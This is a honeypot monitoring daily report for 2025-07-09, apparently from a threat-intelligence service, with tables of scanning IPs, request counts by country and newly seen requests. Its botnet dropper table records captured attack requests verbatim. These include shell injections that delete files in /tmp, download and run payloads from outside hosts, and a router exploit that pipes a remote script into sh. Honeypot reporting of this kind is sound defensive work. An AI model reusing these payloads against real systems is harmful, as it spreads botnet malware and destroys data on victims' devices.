Daily Report: 2025-07-09#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 11 stage 1 IP address(es), linked to 2 dropper URL(s).
There are 4 new requests that have never been observed before (these were added to the monitored request database.).
A total of 556 requests were recorded during the day, originating from 11 different countries, with a peak of 220 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|
botnet_dropper_behaviour#
remote_addr | request |
---|---|
8.222.130.125 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.216.86.134 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.210.161.193 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
49.65.102.238 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.103.247 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.222.194.26 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.213.136.165 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
45.135.194.11 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1 |
8.222.236.162 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
47.242.136.130 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
43.142.121.147 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
13 | 4 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
25 | 2 | GET /aws/.git/config HTTP/1.1 |
27 | 2 | GET /github/.git/config HTTP/1.1 |
64 | 1 | GET /api/contents?type=directory HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 220 | US |
1 | 53 | HK |
2 | 47 | DE |
3 | 38 | NL |
4 | 19 | PL |
5 | 18 | IN |
6 | 15 | CA |
7 | 15 | RU |
8 | 14 | JP |
9 | 10 | GB |
10 | 10 | SG |
11 | 9 | MU |
12 | 8 | CN |
13 | 8 | GH |
14 | 7 | BG |
15 | 7 | LT |
16 | 6 | UA |
17 | 6 | BE |
18 | 5 | AO |
19 | 5 | KR |
20 | 4 | SC |
21 | 3 | ES |
22 | 3 | KZ |
23 | 3 | AE |
24 | 3 | IE |
25 | 3 | BR |
26 | 2 | TR |
27 | 2 | EE |
28 | 2 | MD |
29 | 2 | IL |
30 | 2 | VN |
31 | 1 | BA |
32 | 1 | SE |
33 | 1 | AR |
34 | 1 | GT |
35 | 1 | IT |
36 | 1 | BD |
37 | 1 | GE |